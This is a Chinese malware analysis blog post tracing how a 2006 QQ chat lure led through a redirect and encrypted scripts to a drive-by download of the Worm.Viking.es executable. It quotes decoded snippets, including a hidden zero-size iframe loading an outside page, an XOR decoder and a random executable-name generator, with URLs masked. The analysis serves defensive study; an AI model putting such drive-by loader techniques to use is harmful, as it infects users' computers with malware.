QQ信息中传播Worm.Viking.es的这个网页真复杂

简介: QQ信息中传播Worm.Viking.es的这个网页真复杂

QQ收到如下信息:

/------

4*****1(4*****1)  (2006-11-25 17:31:11)

看看我的嗨舞视频~~~~才上传到Q-Zone空间的...是不是有点太露了?

hxxp://q-zone.qq.%64***%37*%67%2E****%63%6E/ID=****2*/**

------/

hxxp://q-zone.qq.%64***%37*%67%2E****%63%6E/ID=****2*/**的内容中有2段代码值得我们注意:

第1段

/------

<meta http-equiv="refresh" content="5; url=hxxp://u*2.sky***99***.***.cn">

------/

5秒钟后自动转到hxxp://u*2.sky***99***.***.cn,网址中的斜杠写反了^_^。

hxxp://u*2.sky***99***.***.cn

的标题是:手机游戏-彩铃-视频-图片_综合性手机娱乐媒体站!支持中国移动_中国联通_中国电信!

其中也包含有与hxxp://q-zone.qq.%64***%37*%67%2E****%63%6E/ID=****2*/**需要注意的第2段代码。

第2段

这是用HTMLShip XP加密过的JavaScript代码,解密后的代码如下:

/--------

<script language=javascript>nP76=5221;if(document.all){function _dm(){return false};function _mdm(){document.oncontextmenu=_dm;setTimeout("_mdm()",800)};_mdm();}document.oncontextmenu=new Function("return false");function _ndm(e){if(document.layers||window.sidebar){if(e.which!=1)return false;}};if(document.layers){document.captureEvents(Event.MOUSEDOWN);document.onmousedown=_ndm;}else{document.onmouseup=_ndm;};cH44=2933;sF9=6934;function _dws(){window.status = "The page is protected by HTMLShip XP";setTimeout("_dws()",100);};_dws();zU23=6361;yN80=3794;function _dds(){if(document.all){document.onselectstart=function (){return false};setTimeout("_dds()",700)}};_dds();xA39=4936;yE51=77;pO57=2936;bU4=4076;aH63=5218;qF28=9220;gQ34=2078;;_licensed_to_="";</script><iframe src="hxxp://u***2.**3*9*com*.net/mm***/*2****.html" height=0 width=0></iframe>

--------/

主要功能是禁止使用鼠标右键,并引入网页hxxp://u***2.**3*9*com*.net/mm***/*2****.html

hxxp://u***2.**3*9*com*.net/mm***/*2****.html

内容是加密过的JavaScript代码,由于代码很长,这里就不贴出来了,解密后的代码,开头的部分同样是禁止使用鼠标右键,有一个变量值挺有意思:

/--------

_licensed_to_="TEAM iPA";

--------/

接下来的是用Encode加密的VBScript脚本,解密后的脚本代码不贴出来了,主要是使用自定义函数UnEncode()来解密并输出变量hu的值,变量hu的值中包含了多个“浪”字。

解密后的变量hu的值为JavaScript脚本,这是最复杂的部分,使用了setCookie(),getCookie(),register(),Q(),openWin()等自定义函数。

代码从openWin()开始执行,openWin()开始部分的代码如下:

/--------

function openWin(){

var c = getCookie("wangtesta");

if (c != null) {

return;

register("9999ffree");

--------/

利用cookie变量wangtesta来判断是否往下执行脚本,这也提供了一种免疫的方法^_^

如果该cookie变量不存在,则接着用document.write()和unescape()输出迷惑信息:

/--------

Not Found

Sorry!

--------/

然后调用eval()来连接并执行通过调用自定义函数Q()728次解密出来的JavaScript脚本代码。

函数Q()定义如下:

/--------

var Q=function(m)

return String.fromCharCode(m^151);

--------/

该JavaScript脚本代码的功能是利用 Scripting.FileSystemObject、Microsoft.XMLHTTP、Adodb.Stream 下载 文件 u2.exe,保存到 %Windows%,而文件名则由自定义函数gn()随机生成,

/--------

function gn(n)

{var number = Math.random()*n;

return '~tmp'+Math.round(number)+'.exe';}

--------/

文件名为~tmp*.exe,其中的*为数字串,其值范围为~9999,最后通过Shell.Application 的 ShellExecute方法 运行。

u2.exe  瑞星报为 Worm.Viking.es。


相关文章
|
5天前
|
云安全 人工智能 安全
AI被攻击怎么办?
阿里云提供 AI 全栈安全能力,其中对网络攻击的主动识别、智能阻断与快速响应构成其核心防线,依托原生安全防护为客户筑牢免疫屏障。
|
15天前
|
域名解析 人工智能
【实操攻略】手把手教学,免费领取.CN域名
即日起至2025年12月31日,购买万小智AI建站或云·企业官网,每单可免费领1个.CN域名首年!跟我了解领取攻略吧~
|
9天前
|
安全 Java Android开发
深度解析 Android 崩溃捕获原理及从崩溃到归因的闭环实践
崩溃堆栈全是 a.b.c?Native 错误查不到行号?本文详解 Android 崩溃采集全链路原理,教你如何把“天书”变“说明书”。RUM SDK 已支持一键接入。
604 214
|
存储 人工智能 监控
从代码生成到自主决策:打造一个Coding驱动的“自我编程”Agent
本文介绍了一种基于LLM的“自我编程”Agent系统,通过代码驱动实现复杂逻辑。该Agent以Python为执行引擎,结合Py4j实现Java与Python交互,支持多工具调用、记忆分层与上下文工程,具备感知、认知、表达、自我评估等能力模块,目标是打造可进化的“1.5线”智能助手。
843 61
|
7天前
|
人工智能 移动开发 自然语言处理
2025最新HTML静态网页制作工具推荐:10款免费在线生成器小白也能5分钟上手
晓猛团队精选2025年10款真正免费、无需编程的在线HTML建站工具,涵盖AI生成、拖拽编辑、设计稿转代码等多种类型,均支持浏览器直接使用、快速出图与文件导出,特别适合零基础用户快速搭建个人网站、落地页或企业官网。
1247 157
|
4天前
|
编解码 Linux 数据安全/隐私保护
教程分享免费视频压缩软件,免费视频压缩,视频压缩免费,附压缩方法及学习教程
教程分享免费视频压缩软件,免费视频压缩,视频压缩免费,附压缩方法及学习教程
239 138
|
7天前
|
存储 安全 固态存储
四款WIN PE工具,都可以实现U盘安装教程
Windows PE是基于NT内核的轻量系统,用于系统安装、分区管理及故障修复。本文推荐多款PE制作工具,支持U盘启动,兼容UEFI/Legacy模式,具备备份还原、驱动识别等功能,操作简便,适合新旧电脑维护使用。
521 109